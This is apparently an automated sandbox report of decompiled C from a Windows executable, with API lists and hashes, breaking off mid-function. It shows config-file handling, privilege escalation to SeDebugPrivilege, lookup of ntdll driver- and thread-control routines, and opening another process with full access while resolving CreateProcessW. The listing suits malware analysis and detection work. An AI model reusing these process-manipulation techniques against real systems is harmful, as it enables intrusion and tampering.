                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				wcscat( &_v532, L".cfg");
                                                                                                                                                                                                                          				_t18 =  *0x40fa74; // 0x4101c8
                                                                                                                                                                                                                          				_t19 = _t18 + 0x5504;
                                                                                                                                                                                                                          				_t36 =  *_t19;
                                                                                                                                                                                                                          				_pop(_t29);
                                                                                                                                                                                                                          				if( *_t19 != 0) {
                                                                                                                                                                                                                          					E00404923(0x104,  &_v532, _t19);
                                                                                                                                                                                                                          					_pop(_t29);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t22 = E00402FC6(_t29, _t36,  &_v532); // executed
                                                                                                                                                                                                                          				return _t22;
                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402F51
                                                                                                                                                                                                                            • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 00402F6F
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00402F8A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                                                          • String ID: .cfg
                                                                                                                                                                                                                          • API String ID: 776488737-3410578098
                                                                                                                                                                                                                          • Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                                                                                                                          • Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 35%
                                                                                                                                                                                                                          			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
                                                                                                                                                                                                                          				char _v16390;
                                                                                                                                                                                                                          				short _v16392;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				intOrPtr* _t30;
                                                                                                                                                                                                                          				intOrPtr* _t34;
                                                                                                                                                                                                                          				signed int _t36;
                                                                                                                                                                                                                          				signed int _t37;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t30 = __ecx;
                                                                                                                                                                                                                          				E0040B550(0x4004, __ecx);
                                                                                                                                                                                                                          				_push(0x4000);
                                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                                          				_v16392 = 0;
                                                                                                                                                                                                                          				_t34 = _t30;
                                                                                                                                                                                                                          				_push( &_v16390);
                                                                                                                                                                                                                          				if(_a4 == 0) {
                                                                                                                                                                                                                          					memset();
                                                                                                                                                                                                                          					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20); // executed
                                                                                                                                                                                                                          					asm("sbb esi, esi");
                                                                                                                                                                                                                          					_t37 =  ~_t36;
                                                                                                                                                                                                                          					E004051B8( &_v16392, _t34, _a16);
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					memset();
                                                                                                                                                                                                                          					E0040512F(_a16,  *_t34,  &_v16392);
                                                                                                                                                                                                                          					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t37;
                                                                                                                                                                                                                          			}











                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409E08
                                                                                                                                                                                                                            • Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
                                                                                                                                                                                                                            • Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184
                                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409E3B
                                                                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32 ref: 00409E5D
Memory Dump Source
• Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1127616056-0
                                                                                                                                                                                                                          • Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                                                                                                                          • Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
                                                                                                                                                                                                                          				void* _t8;
                                                                                                                                                                                                                          				void* _t13;
                                                                                                                                                                                                                          				signed int _t16;
                                                                                                                                                                                                                          				void** _t21;
                                                                                                                                                                                                                          				signed int _t22;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t21 = __edi;
                                                                                                                                                                                                                          				_t22 =  *__eax;
                                                                                                                                                                                                                          				if(__edx < _t22) {
                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t13 =  *__edi;
                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                          						_t1 =  &_a8; // 0x4057e1
                                                                                                                                                                                                                          						 *__eax =  *__eax +  *_t1;
                                                                                                                                                                                                                          						_t16 =  *__eax;
                                                                                                                                                                                                                          					} while (__edx >= _t16);
                                                                                                                                                                                                                          					_t8 = malloc(_t16 * _a4); // executed
                                                                                                                                                                                                                          					 *__edi = _t8;
                                                                                                                                                                                                                          					if(_t22 > 0) {
                                                                                                                                                                                                                          						if(_t8 != 0) {
                                                                                                                                                                                                                          							memcpy(_t8, _t13, _t22 * _a4);
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						free(_t13); // executed
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					return 0 |  *_t21 != 0x00000000;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • malloc.MSVCRT ref: 0040496D
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00404985
                                                                                                                                                                                                                          • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: freemallocmemcpy
                                                                                                                                                                                                                          • String ID: W@
                                                                                                                                                                                                                          • API String ID: 3056473165-1729568415
                                                                                                                                                                                                                          • Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                                                                                                                          • Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00405436(wchar_t* _a4) {
                                                                                                                                                                                                                          				void _v2050;
                                                                                                                                                                                                                          				signed short _v2052;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t16;
                                                                                                                                                                                                                          				WCHAR* _t18;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_v2052 = _v2052 & 0x00000000;
                                                                                                                                                                                                                          				memset( &_v2050, 0, 0x7fe);
                                                                                                                                                                                                                          				E00404C3C( &_v2052);
                                                                                                                                                                                                                          				_t18 =  &_v2052;
                                                                                                                                                                                                                          				E004047AF(_t18);
                                                                                                                                                                                                                          				wcscat(_t18, _a4);
                                                                                                                                                                                                                          				_t16 = LoadLibraryW(_t18); // executed
                                                                                                                                                                                                                          				if(_t16 == 0) {
                                                                                                                                                                                                                          					return LoadLibraryW(_a4);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t16;
                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00405456
                                                                                                                                                                                                                            • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                                                                                                                            • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                                                                                                                            • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                                                                                                                                                                            • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00405478
                                                                                                                                                                                                                          • LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3725422290-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32 ref: 00409EA9
                                                                                                                                                                                                                            • Part of subcall function 00409D12: memset.MSVCRT ref: 00409D31
                                                                                                                                                                                                                            • Part of subcall function 00409D12: _itow.MSVCRT ref: 00409D48
                                                                                                                                                                                                                            • Part of subcall function 00409D12: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00409D57
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4232544981-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                          				void* _t8;
                                                                                                                                                                                                                          				void* _t13;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                          				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
                                                                                                                                                                                                                          				_t13 = _t8;
                                                                                                                                                                                                                          				if(_v8 != 0) {
                                                                                                                                                                                                                          					FreeLibrary(_v8);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t13;
                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                                                                                                                            • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentErrorFreeLastLibraryProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 187924719-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                                          			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				intOrPtr* _t6;
                                                                                                                                                                                                                          				void* _t8;
                                                                                                                                                                                                                          				struct HINSTANCE__** _t10;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t10 = __eax;
                                                                                                                                                                                                                          				E00409921(__eax);
                                                                                                                                                                                                                          				_t6 =  *((intOrPtr*)(_t10 + 0x10));
                                                                                                                                                                                                                          				if(_t6 == 0) {
                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
                                                                                                                                                                                                                          				return _t8;
                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                                                                                                                            • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                                                                                                                            • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                                                                                                                            • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                                                                                                                            • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$FileModuleName
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3859505661-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E004095DA(signed int* __edi) {
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t3;
                                                                                                                                                                                                                          				signed int* _t7;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t7 = __edi;
                                                                                                                                                                                                                          				_t3 =  *__edi;
                                                                                                                                                                                                                          				if(_t3 != 0) {
                                                                                                                                                                                                                          					FreeLibrary(_t3); // executed
                                                                                                                                                                                                                          					 *__edi =  *__edi & 0x00000000;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				E004099D4( &(_t7[0xa]));
                                                                                                                                                                                                                          				return E004099D4( &(_t7[6]));
                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
                                                                                                                                                                                                                          				return 1;
                                                                                                                                                                                                                          			}




                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EnumNamesResource
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3334572018-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00408E31() {
                                                                                                                                                                                                                          				void* _t1;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t2;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t14;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				if( *0x41c4ac == 0) {
                                                                                                                                                                                                                          					_t2 = GetModuleHandleW(L"ntdll.dll");
                                                                                                                                                                                                                          					 *0x41c4ac = _t2;
                                                                                                                                                                                                                          					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
                                                                                                                                                                                                                          					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
                                                                                                                                                                                                                          					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
                                                                                                                                                                                                                          					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
                                                                                                                                                                                                                          					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
                                                                                                                                                                                                                          					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
                                                                                                                                                                                                                          					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
                                                                                                                                                                                                                          					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
                                                                                                                                                                                                                          					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
                                                                                                                                                                                                                          					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
                                                                                                                                                                                                                          					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
                                                                                                                                                                                                                          					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
                                                                                                                                                                                                                          					 *0x41c4a8 = _t14;
                                                                                                                                                                                                                          					return _t14;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t1;
                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                          • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                                                          • API String ID: 667068680-4280973841
                                                                                                                                                                                                                          • Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                                                                                                                          • Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                                                                          			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                          				long _v28;
                                                                                                                                                                                                                          				char _v564;
                                                                                                                                                                                                                          				char _v16950;
                                                                                                                                                                                                                          				char _v33336;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _v33348;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _v33352;
                                                                                                                                                                                                                          				void _v33420;
                                                                                                                                                                                                                          				void _v33432;
                                                                                                                                                                                                                          				void _v33436;
                                                                                                                                                                                                                          				intOrPtr _v66756;
                                                                                                                                                                                                                          				intOrPtr _v66760;
                                                                                                                                                                                                                          				void _v66848;
                                                                                                                                                                                                                          				void _v66852;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				void* _t76;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t84;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t87;
                                                                                                                                                                                                                          				void* _t90;
                                                                                                                                                                                                                          				signed int _t126;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t128;
                                                                                                                                                                                                                          				intOrPtr* _t138;
                                                                                                                                                                                                                          				void* _t140;
                                                                                                                                                                                                                          				void* _t144;
                                                                                                                                                                                                                          				void* _t147;
                                                                                                                                                                                                                          				void* _t148;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				E0040B550(0x10524, __ecx);
                                                                                                                                                                                                                          				_t138 = _a4;
                                                                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                                                                          				 *_t138 = 0;
                                                                                                                                                                                                                          				_t76 = OpenProcess(0x1f0fff, 0, _a8);
                                                                                                                                                                                                                          				_a8 = _t76;
                                                                                                                                                                                                                          				if(_t76 == 0) {
                                                                                                                                                                                                                          					 *_t138 = GetLastError();
                                                                                                                                                                                                                          					L30:
                                                                                                                                                                                                                          					return _v12;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_v33436 = 0;
                                                                                                                                                                                                                          				memset( &_v33432, 0, 0x8284);
                                                                                                                                                                                                                          				_t148 = _t147 + 0xc;
                                                                                                                                                                                                                          				_t128 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                          				E00409C70( &_v8);
                                                                                                                                                                                                                          				_push("CreateProcessW");
                                                                                                                                                                                                                          				_push(_t128);
                                                                                                                                                                                                                          				if(_v8 == 0) {
                                                                                                                                                                                                                          					_t84 = GetProcAddress();
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t84 = _v8();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_v33352 = _t84;
                                                                                                                                                                                                                          				E00409C70( &_v8);
                                                                                                                                                                                                                          				_push("GetLastError");
                                                                                                                                                                                                                          				_push(_t128);
                                                                                                                                                                                                                          				if(_v8 == 0) {
                                                                                                                                                                                                                          					_t87 = GetProcAddress();
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t87 = _v8();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t140 = _a28;
                                                                                                                                                                                                                          				_v33348 = _t87;
                                                                                                                                                                                                                          				if(_t140 != 0) {
